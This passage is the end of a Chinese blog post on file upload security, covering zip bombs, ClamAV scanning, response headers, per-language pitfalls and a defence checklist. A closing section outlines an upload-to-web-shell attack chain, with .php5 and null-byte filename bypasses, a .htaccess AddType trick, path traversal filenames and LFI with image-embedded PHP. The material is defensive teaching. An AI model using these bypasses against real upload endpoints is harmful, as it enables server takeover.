</code></pre>
<p>对压缩包必须做解压后的体积检查（防止 Zip 炸弹），设置解压倍率上限（如原始大小的 100 倍）。</p>
<h4 id="3-5-防病毒扫描"><a href="#3-5-防病毒扫描" class="headerlink" title="3.5 防病毒扫描"></a>3.5 防病毒扫描</h4><p>对上传文件做病毒扫描，可以集成 ClamAV 等开源引擎：</p>
<pre><code class="java">// Java 集成 ClamAV
try (Socket socket = new Socket(&quot;localhost&quot;, 3310);
     OutputStream os = socket.getOutputStream();
     InputStream is = socket.getInputStream()) &#123;
    os.write(&quot;zSCAN\n&quot;.getBytes());
    os.write(fileBytes);
    os.write(&quot;\0&quot;.getBytes());
    // 读取扫描结果
&#125;
</code></pre>
<h4 id="3-6-安全响应头"><a href="#3-6-安全响应头" class="headerlink" title="3.6 安全响应头"></a>3.6 安全响应头</h4><p>服务端返回上传文件时，设置以下响应头降低风险：</p>
<pre><code>Content-Disposition: attachment; filename=&quot;downloaded-file.jpg&quot;
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src &#39;none&#39;; style-src &#39;self&#39; &#39;unsafe-inline&#39;
</code></pre>
<p><code>Content-Disposition: attachment</code> 强制浏览器下载而非内联渲染，阻止 SVG/HTML 的 XSS 执行。<code>nosniff</code> 阻止浏览器 MIME 嗅探。CSP 限制文件只能加载自身资源。</p>
<hr>
<h3 id="四、各语言常见陷阱"><a href="#四、各语言常见陷阱" class="headerlink" title="四、各语言常见陷阱"></a>四、各语言常见陷阱</h3><h4 id="4-1-Java"><a href="#4-1-Java" class="headerlink" title="4.1 Java"></a>4.1 Java</h4><ul>
<li><code>MultipartFile.getOriginalFilename()</code> 返回的是客户端提供的原始值，不可信</li>
<li><code>File.renameTo()</code> 在某些平台上不保证原子性，条件竞争场景需注意</li>
<li>Apache Commons FileUpload 旧版本存在路径穿越漏洞（CVE-2016-1000030）</li>
<li>Spring Boot 默认使用临时目录存储上传文件，需确保临时目录权限正确</li>
</ul>
<h4 id="4-2-PHP"><a href="#4-2-PHP" class="headerlink" title="4.2 PHP"></a>4.2 PHP</h4><ul>
<li><code>$_FILES[&#39;file&#39;][&#39;type&#39;]</code> 来自请求头，完全可伪造</li>
<li><code>move_uploaded_file()</code> 是安全的上传函数，它会检查文件确实通过 HTTP POST 上传</li>
<li><code>getimagesize()</code> 可以验证图片尺寸，但不能完全替代内容校验</li>
<li>PHP 5.3 以下存在空字节截断漏洞：<code>shell.php%00.jpg</code> 在文件系统操作中被截断为 <code>shell.php</code></li>
<li><code>$_FILES</code> 同名覆盖特性（同名字段后者覆盖前者）</li>
</ul>
<h4 id="4-3-Python"><a href="#4-3-Python" class="headerlink" title="4.3 Python"></a>4.3 Python</h4><ul>
<li><code>os.path.join(base, user_input)</code> 如果 <code>user_input</code> 是绝对路径，会直接返回 <code>user_input</code></li>
<li>Flask 的 <code>secure_filename()</code> 会剥离路径分隔符和特殊字符，但不处理 magic number</li>
<li>Django 的 <code>FileField</code> 默认不校验文件内容类型</li>
<li>Pillow 的 <code>Image.verify()</code> 只检查文件头，不保证图片完全合法；更安全的做法是打开图片后重新保存</li>
</ul>
<hr>
<h3 id="五、完整防御清单"><a href="#五、完整防御清单" class="headerlink" title="五、完整防御清单"></a>五、完整防御清单</h3><p>将防御措施按优先级排列：</p>
<ol>
<li>上传目录禁止执行脚本（最关键，最后一道防线）</li>
<li>服务端生成随机文件名，不信任客户端文件名</li>
<li>扩展名白名单（而非黑名单）</li>
<li>Magic Number + 内容完整性校验（图片重编码验证）</li>
<li>文件大小限制 + 上传速率限制</li>
<li>独立域名/对象存储隔离上传文件</li>
<li>安全响应头（Content-Disposition: attachment, nosniff, CSP）</li>
<li>防病毒扫描</li>
<li>日志记录所有上传行为（文件名、IP、时间、大小、哈希）</li>
<li>定期审计上传目录中的文件</li>
</ol>
<hr>
<h3 id="六、攻击链示例：从上传到-GetShell"><a href="#六、攻击链示例：从上传到-GetShell" class="headerlink" title="六、攻击链示例：从上传到 GetShell"></a>六、攻击链示例：从上传到 GetShell</h3><p>一个典型的完整攻击链：</p>
<ol>
<li>发现上传接口，测试发现仅校验前端 JS 扩展名 → 直接绕过</li>
<li>上传 <code>.php</code> 文件被拦截 → 尝试 <code>.php5</code> 成功（黑名单不完整）</li>
<li>或者：上传 <code>shell.jpg</code>（内容是 PHP），同时上传 <code>.htaccess</code>（<code>AddType application/x-httpd-php .jpg</code>）→ 访问 <code>shell.jpg</code> 被当 PHP 执行</li>
<li>如果上传目录禁止执行 → 尝试路径穿越写到其他目录 → <code>filename=../../app/shell.php</code></li>
<li>如果路径穿越也被防住 → 寻找文件包含漏洞（LFI）配合图片马 → 上传含 PHP 代码的图片 → 通过 <code>include()</code> 触发执行</li>
</ol>
<p>这条攻击链说明：纵深防御的每一层都很重要，任何一层缺失都可能被突破。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">小竹</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2026/08/06/2026-08-06-file-upload-security/">http://example.com/2026/08/06/2026-08-06-file-upload-security/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">小竹</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">安全</span>
                                </a>
                            
                                <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
                                    <span class="chip bg-color">文件上传</span>
                                </a>
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2026/08/06/2026-08-06-file-upload-security/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="文件上传安全：原理、攻击与防御">
                        
                        <span class="card-title">文件上传安全：原理、攻击与防御</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
                        <span class="chip bg-color">文件上传</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/08/03/2026-08-03-sql-injection-guide/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/15.jpg" class="responsive-img" alt="SQL 注入原理与防御指南">
                        
                        <span class="card-title">SQL 注入原理与防御指南</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-03
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SQL%E6%B3%A8%E5%85%A5/">
                        <span class="chip bg-color">SQL注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2026</span>
            
            <a href="/about" target="_blank">小竹</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/zhuyanzhen-lab" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
